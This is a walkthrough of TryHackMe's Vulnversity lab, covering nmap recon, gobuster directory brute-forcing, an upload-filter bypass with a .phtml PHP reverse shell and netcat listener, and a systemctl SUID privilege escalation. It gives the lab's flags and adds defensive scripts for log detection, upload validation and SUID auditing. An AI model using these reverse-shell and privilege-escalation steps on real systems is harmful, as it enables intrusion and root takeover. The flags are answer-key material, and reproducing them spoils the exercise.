Vulnversity Walkthrough

Vulnversity

The following are the answers and a rough guide to the Vulnversity machine on TryHackMe.

Task 1 - Deploy the machine

Deploy the machine

No Answer Needed

Task 2 - Reconnaissance

Gather information about this machine using a network scanning tool called nmap. Check out the Nmap room for more on this!

There are many nmap “cheatsheets” online that you can use too.

No Answer Needed

Scan the box, how many ports are open?

6

— My usual one-liner for nmap is: nmap -sV -sC -p- <IP> -o <box>.nmap. I like to output to a separate file to keep things neat and easy to access.

What version of the squid proxy is running on the machine?

3.5.12

— Shown in the nmap results.

How many ports will nmap scan if the flag -p-400 was used?

400

— This is an interesting question because I made the mistake of changing the script to nmap -sV -sC -p-400 10.10.100.0, assuming the answer was 21, 22 and 139, the 3 total ports under 400, BUT the question is asking how many ports nmap will scan. The answer is in the question: it’s 400 🤦‍♂️

Using the nmap flag -n what will it not resolve?

DNS

— Check the manual page on Linux with man nmap: it lists “-n/-R: Never do DNS resolution/Always resolve [default: sometimes]”, so with -n nmap is not resolving DNS.

What is the most likely operating system this machine is running?

Ubuntu

— nmap gives us a good guess at OS discovery; in this case the service banners point to Ubuntu.

What port is the web server running on?

3333

— nmap displays this for us: 3333/tcp open http Apache httpd 2.4.18 ((Ubuntu)), i.e. HTTP is open on port 3333.

It’s important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important; don’t forget that ports in a higher range might be open, so always scan ports above 1000 (even if you leave the scan running in the background).

No Answer Needed
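The Task 2 questions are all answered by reading the scan output (open-port count, service versions, the web server port, OS hints) plus one point of nmap syntax (how many ports -p-400 covers). The following script is an added example, not part of the original walkthrough or of nmap: it parses nmap's normal (-oN) output and answers those questions programmatically. The SAMPLE_NMAP text is constructed to be consistent with the numbers given above (six open ports, Squid 3.5.12, Apache on 3333); it is not a real scan.

```python
import re
from collections import Counter

# Constructed sample of nmap normal (-oN) output, consistent with the walkthrough's
# answers. The host, timestamps and banners are illustrative, not a captured scan.
SAMPLE_NMAP = """\
# Nmap 7.93 scan initiated Mon Jan  1 12:00:00 2024 as: nmap -sV -sC -p- -oN box.nmap 10.10.100.0
Nmap scan report for 10.10.100.0
Host is up (0.020s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE    SERVICE     VERSION
21/tcp   open     ftp         vsftpd 3.0.3
22/tcp   open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open     http-proxy  Squid http proxy 3.5.12
3333/tcp open     http        Apache httpd 2.4.18 ((Ubuntu))
8080/tcp filtered http-proxy
Service Info: Host: VULNVERSITY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port line: "<port>/<proto> <state> <service> <version...>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
OS_TOKENS = ("Ubuntu", "Debian", "CentOS", "Red Hat", "FreeBSD", "Windows")


def parse_nmap(text):
    """Return one dict per port line found in nmap normal output."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            entries.append({"port": int(port), "proto": proto, "state": state,
                            "service": service, "version": version.strip()})
    return entries


def open_ports(entries):
    """Sorted list of ports whose state is exactly 'open' (filtered ones excluded)."""
    return sorted(e["port"] for e in entries if e["state"] == "open")


def service_version(entries, product):
    """Numeric version of the first open service whose banner mentions `product`."""
    for e in entries:
        if e["state"] == "open" and product.lower() in e["version"].lower():
            m = re.search(r"\d+(?:\.\d+)+", e["version"])
            return m.group(0) if m else None
    return None


def web_server_ports(entries):
    """Open ports nmap identified as a plain web server (proxies are not counted)."""
    return sorted(e["port"] for e in entries
                  if e["state"] == "open"
                  and e["service"] in ("http", "https", "http-alt", "ssl/http"))


def os_guess(entries):
    """Most frequent OS token across service banners, the same hint -sV gives a human."""
    counts = Counter()
    for e in entries:
        for token in OS_TOKENS:
            if token in e["version"]:
                counts[token] += 1
    return counts.most_common(1)[0][0] if counts else None


def count_port_spec(spec):
    """Number of distinct ports an nmap -p specification covers.
    An open-ended range defaults to 1 on the left and 65535 on the right,
    so '-' is the full range and '-400' is ports 1..400."""
    ports = set()
    for item in spec.split(","):
        item = item.split(":")[-1]          # drop T:/U: protocol prefixes
        if "-" in item:
            lo, hi = item.split("-", 1)
            start = int(lo) if lo else 1
            end = int(hi) if hi else 65535
            ports.update(range(start, end + 1))
        else:
            ports.add(int(item))
    return len(ports)


if __name__ == "__main__":
    found = parse_nmap(SAMPLE_NMAP)
    print("open ports:", open_ports(found), "count:", len(open_ports(found)))
    print("squid version:", service_version(found, "Squid"))
    print("web server ports:", web_server_ports(found))
    print("OS guess:", os_guess(found))
    print("-p-400 scans", count_port_spec("-400"), "ports")
```

The state check in open_ports is deliberately strict: a filtered port still appears in the output, and counting it would give the wrong answer to “how many ports are open”. Feeding the script your own -oN file instead of SAMPLE_NMAP is a quick way to keep scan results in a form you can diff between runs.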

Task 3 - Locating directories using GoBuster

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

Now let’s run GoBuster with a wordlist: gobuster dir -u http://<ip>:3333 -w <word list location>

No Answer Needed

What is the directory that has an upload form page?

/internal/

— The command to run was given previously: gobuster dir -u http://10.10.100.0:3333 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -o vulnversity.gobuster. I elected to use seclists for this exercise and, again, an output file. Since gobuster displays everything in the terminal we can click the linked options to open them in the browser. Only one page has an upload section, so /internal/ it is.
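From the defender’s side, a directory brute-force like the one above is loud: one client produces a burst of 404s against paths nobody links to. The script below is an added example, not part of the walkthrough or of GoBuster, showing the detection logic over constructed Apache combined-format log lines (the addresses, paths and timestamps are made up). It flags any client whose 404 count inside a sliding time window reaches a threshold.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined-log line: client, ident, user, [timestamp], "request", status, ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def parse_line(line):
    """Return (ip, time, method, path, status), or None for a malformed line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path, int(status)


def find_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Clients whose 404 count inside any sliding `window` reaches `threshold`.
    Returns {ip: peak number of 404s seen in one window}."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[4] == 404:
            per_ip[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        best = start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:    # slide the window's left edge forward
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def _stamp(t):
    return t.strftime("%d/%b/%Y:%H:%M:%S %z")


def constructed_log():
    """Constructed sample: one client walking a wordlist, one browsing normally."""
    base = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(30):                        # 30 misses in 30 seconds from one address
        t = base + timedelta(seconds=i)
        lines.append(f'10.0.0.5 - - [{_stamp(t)}] "GET /guess{i}/ HTTP/1.1" 404 275 "-" "-"')
    normal = [("/", 200), ("/internal/", 200), ("/favicon.ico", 404), ("/internal/", 200)]
    for i, (path, status) in enumerate(normal):
        t = base + timedelta(seconds=5 * i)
        lines.append(f'10.0.0.9 - - [{_stamp(t)}] "GET {path} HTTP/1.1" {status} 1024 "-" "-"')
    lines.append("garbage line that does not parse")   # tolerated, not counted
    return lines


SAMPLE_LOG = constructed_log()

if __name__ == "__main__":
    for ip, peak in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {peak} 404s within 60s, likely directory brute-force")
```

A single stray 404 from the normal client never reaches the threshold, which is the point of counting per window rather than per request. Tune threshold and window to your site’s real miss rate before acting on the output.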

Task 4 - Compromise the webserver

Now that you have found a form to upload files, we can leverage this to upload and execute a payload that will lead to compromising the web server.

Try uploading a few file types to the server; what common extension seems to be blocked?

.php

— The guide recommends doing the BurpSuite room first so you know how to use it to fuzz uploads. I threw together a small list of things to try and .php was the 3rd thing I could think of in that list; needless to say it was completed quickly.

If you are unsure what BurpSuite is, or how to set it up, please complete our BurpSuite room first.

No Answer Needed

— Not a question, more a checkpoint to make sure you do the room first.

Run this attack, what extension is allowed?

.phtml

— The room walks you through this using Burp Intruder with the Sniper attack type.
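The reason .phtml gets through is that the form rejects by blocklist: it knows about .php but not about the other extensions the server’s PHP handler also executes (on Ubuntu the Apache PHP module configuration matches .php, .phtml and .phar). The code below is an added example, not the room’s form or anything from the box, contrasting that blocklist with an allowlist plus content check. Everything in it is illustrative; the sample file bodies are constructed.

```python
import os
import uuid

# Extensions the application actually expects to receive (an allowlist).
IMAGE_ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif"}

# Leading bytes each allowed type must start with, so a renamed script is caught.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def extension(filename):
    """Final suffix, lower-cased: 'shell.php.png' -> '.png'."""
    return os.path.splitext(os.path.basename(filename))[1].lower()


def blocklist_allows(filename):
    """The weak check: only names ending in '.php' are rejected.
    Anything else the PHP handler also executes (.phtml on this box) is accepted."""
    return not filename.endswith(".php")


def allowlist_allows(filename):
    """Hardened extension check: accept only the extensions we expect."""
    return extension(filename) in IMAGE_ALLOWLIST


def validate_upload(filename, data):
    """Full check: allowlisted extension, matching magic bytes, server-chosen name.
    Returns (True, stored_name) or (False, reason)."""
    ext = extension(filename)
    if ext not in IMAGE_ALLOWLIST:
        return False, "extension not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    # Never reuse the client's name: it must not be able to pick the handler.
    return True, uuid.uuid4().hex + ext


if __name__ == "__main__":
    png = MAGIC[".png"] + b"\x00" * 16          # constructed minimal PNG prefix
    script = b"<?php echo 'hello'; ?>"          # constructed script body
    for name, data in [("photo.png", png), ("shell.php", script),
                       ("shell.phtml", script), ("shell.php.png", script)]:
        print(f"{name:14} blocklist={blocklist_allows(name)!s:5} "
              f"allowlist={allowlist_allows(name)!s:5} full={validate_upload(name, data)}")
```

The extension check alone still accepts shell.php.png; the magic-byte check is what rejects it. The remaining layer is server side: store uploads outside the document root, or disable script execution for the uploads directory, so that even a file that slips past validation is served as data rather than run.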

Download the PHP shell you are provided, run netcat to listen for incoming connections (nc -lvnp 1234), then edit and upload the shell and navigate to that page: http://<ip>:3333/internal/uploads/php-reverse-shell.phtml

No Answer Needed

What is the name of the user who manages the webserver?

bill

— When netcat receives the connection we are logged in as www-data in the / directory. To find a user we need to cd into /home, which in this case contains bill’s folder (ls in the directory shows it).

What is the user flag?

8bd7992fbe8a6ad22a63361004cfcedb

— cd into bill’s directory and ls once more; we are presented with user.txt. Handily, as we are on Linux, you can ‘cat’ the contents to the terminal with cat user.txt and the result is displayed.

Task 5 - Privilege Escalation

Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).

On the system, search for all SUID files. What file stands out?

/bin/systemctl

— Having used Linux for a while you tend to pick up a few things; in this case I learned how to ‘find’ the things I am looking for. We can use the ‘find’ command to look for interesting things: find / -user root -perm -4000 -exec ls -ldb {} \; which shows us a number of binaries with SUID privileges in the output. The idea is to exploit one of these to run a script which leads us on to privilege escalation. Using GTFOBins we can check each of the entries one by one. Having searched, there is systemctl, which can be exploited using SUID permissions.
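The same enumeration is worth running as an audit on systems you own: list everything with the set-user-ID bit and sort it into expected (passwd, sudo and friends), known-dangerous (binaries GTFOBins documents as escalatable when SUID, systemctl among them) and needs-review. The script below is an added example, not from the walkthrough or from GTFOBins, that does this over a directory tree. It builds a throwaway tree under a temp directory with constructed files so it runs anywhere; point find_suid at "/" to audit a real host. Both name sets are short illustrative subsets, not the complete lists.

```python
import os
import shutil
import stat
import tempfile

# Illustrative subset of binaries that are legitimately SUID root on Ubuntu.
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "chsh", "chfn", "gpasswd", "newgrp"}

# Illustrative subset of GTFOBins' SUID section; keep the full list from the site.
GTFOBINS_SUID = {"systemctl", "find", "vim", "env", "bash", "python"}


def find_suid(root):
    """Regular files under `root` with the SUID bit, the same set `find root -perm -4000` lists."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)               # lstat: do not follow symlinks
            except OSError:
                continue                          # unreadable entries are skipped, not fatal
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def classify(paths):
    """Map each SUID path to a verdict a reviewer can act on."""
    report = {}
    for p in paths:
        name = os.path.basename(p)
        if name in GTFOBINS_SUID:
            report[p] = "remove SUID: documented privilege-escalation primitive"
        elif name in EXPECTED_SUID:
            report[p] = "expected"
        else:
            report[p] = "review"
    return report


def audit(root):
    """Basename -> verdict for every SUID file under root."""
    return {os.path.basename(p): v for p, v in classify(find_suid(root)).items()}


def build_demo_tree():
    """Constructed demo tree: a few shell stubs, three of them marked SUID."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    for name, mode in [("systemctl", 0o4755), ("passwd", 0o4755),
                       ("ls", 0o755), ("custom-helper", 0o4755)]:
        path = os.path.join(bindir, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    try:
        for name, verdict in audit(root).items():
            print(f"{name:14} {verdict}")
    finally:
        shutil.rmtree(root)
```

For an entry in the “remove SUID” bucket the fix is chmod u-s on the binary (systemctl does not need the bit for ordinary use); for the “review” bucket, check what the binary does and whether any of its invocations can be steered by an unprivileged user.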

Become root and get the last flag (/root/root.txt)

a58ff8579f0a9270368d33a9966c7fd5

— Using the GTFOBins page for systemctl we can modify the code and get it to cat out the content of /root/root.txt. Cheeky, but effective. The code for this is below:

# Run from /bin so that ./systemctl is the SUID binary found above.
TF=$(mktemp).service
# A one-shot unit whose command runs as root when the unit starts.
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/ha3ks"
[Install]
WantedBy=multi-user.target' > "$TF"
# Register the unit file, then enable and start it immediately.
./systemctl link "$TF"
./systemctl enable --now "$TF"
# The output is now readable from /tmp/ha3ks.

Now when I ran this I had an issue where it would not output, but after a box reset and ensuring I was in the /bin/ directory, it worked. I could then run cat /tmp/ha3ks.


I don’t have any sponsors or anything but if you enjoy my work, or feel sympathy for my wife, then I have set up a Ko-Fi account as well as a BuyMeACoffee people can donate to.